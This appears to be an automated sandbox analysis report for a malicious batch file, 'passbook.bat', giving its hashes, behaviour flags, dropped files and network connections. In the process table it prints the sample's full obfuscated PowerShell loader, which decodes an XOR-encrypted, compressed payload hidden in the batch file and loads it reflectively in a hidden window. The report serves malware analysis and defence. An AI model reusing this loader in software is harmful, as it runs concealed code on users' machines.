| File name: | passbook.bat |
| Full analysis: | https://app.any.run/tasks/c455a420-8ff2-4c45-a351-1b22c252a1c8 |
| Verdict: | Malicious activity |
| Analysis date: | December 07, 2023, 09:32:52 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines, with CRLF line terminators |
| MD5: | 4315A95F1867B8780C7751425AFD1B00 |
| SHA1: | 7DA4523AEE15C8D64EB0C69EC089A8D3856F5B94 |
| SHA256: | 5A668CA2746E15FDC5081417CB74E204A7472B6A4846D189C6788BA2122EC2E2 |
| SSDEEP: | 6144:3G0XwgLQfIzzAplbJvVi8jJ9VlpYoNDkz4PcKsBbB:zwgLQfIz6bJhLNDm4PGbB |
MALICIOUS
Starts PowerShell from an unusual location
- cmd.exe (PID: 2820)
Drops the executable file immediately after the start
- cmd.exe (PID: 2820)
SUSPICIOUS
Process drops legitimate windows executable
- cmd.exe (PID: 2820)
Checks Windows Trust Settings
- passbook.bat.exe (PID: 1828)
Reads security settings of Internet Explorer
- passbook.bat.exe (PID: 1828)
INFO
Checks supported languages
- passbook.bat.exe (PID: 1828)
Process checks Powershell version
- passbook.bat.exe (PID: 1828)
Reads the computer name
- passbook.bat.exe (PID: 1828)
Create files in a temporary directory
- passbook.bat.exe (PID: 1828)
The executable file from the user directory is run by the CMD process
- passbook.bat.exe (PID: 1828)
Reads the machine GUID from the registry
- passbook.bat.exe (PID: 1828)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
35
Monitored processes
2
Malicious processes
1
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1828 | "passbook.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_LySsA = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\admin\AppData\Local\Temp\passbook.bat').Split([Environment]::NewLine);foreach ($_CASH_XVnDV in $_CASH_LySsA) { if ($_CASH_XVnDV.StartsWith(':: @')) { $_CASH_yLlle = $_CASH_XVnDV.Substring(4); break; }; };$_CASH_yLlle = [System.Text.RegularExpressions.Regex]::Replace($_CASH_yLlle, '_CASH_', '');$_CASH_tlnQi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_yLlle);$_CASH_luTRm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gmdNqrGKR75B5uTjT7nSG3J9qXGRxgQ2rpkd2YFtrb0=');for ($i = 0; $i -le $_CASH_tlnQi.Length - 1; $i++) { $_CASH_tlnQi[$i] = ($_CASH_tlnQi[$i] -bxor $_CASH_luTRm[$i % $_CASH_luTRm.Length]); };$_CASH_CTYfs = New-Object System.IO.MemoryStream(, $_CASH_tlnQi);$_CASH_IqPKL = New-Object System.IO.MemoryStream;$_CASH_kIqYa = New-Object System.IO.Compression.GZipStream($_CASH_CTYfs, [IO.Compression.CompressionMode]::Decompress);$_CASH_kIqYa.CopyTo($_CASH_IqPKL);$_CASH_kIqYa.Dispose();$_CASH_CTYfs.Dispose();$_CASH_IqPKL.Dispose();$_CASH_tlnQi = $_CASH_IqPKL.ToArray();$_CASH_HdSSE = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_tlnQi);$_CASH_zCEwT = $_CASH_HdSSE.EntryPoint;$_CASH_zCEwT.Invoke($null, (, [string[]] (''))) | C:\Users\admin\AppData\Local\Temp\passbook.bat.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 2820 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\passbook.bat" " | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
Total events
677
Read events
677
Write events
0
Delete events
0
Modification events
Executable files
1
Suspicious files
3
Text files
0
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1828 | passbook.bat.exe | C:\Users\admin\AppData\Local\Temp\gu5ayjj0.eiz.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 2820 | cmd.exe | C:\Users\admin\AppData\Local\Temp\passbook.bat.exe | executable | |
MD5:A575A7610E5F003CC36DF39E07C4BA7D | SHA256:006CEF6EF6488721895D93E4CEF7FA0709C2692D74BDE1E22E2A8719B2A86218 | |||
| 1828 | passbook.bat.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:35B82F832476A82B479BE7EAA6A28F13 | SHA256:F837A3B841E3D415EFCE6F444D8FA25A18FF156CC5C1CAA5A4918A04E01BD045 | |||
| 1828 | passbook.bat.exe | C:\Users\admin\AppData\Local\Temp\p32chbqr.jcv.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
5
DNS requests
0
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
324 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
1956 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |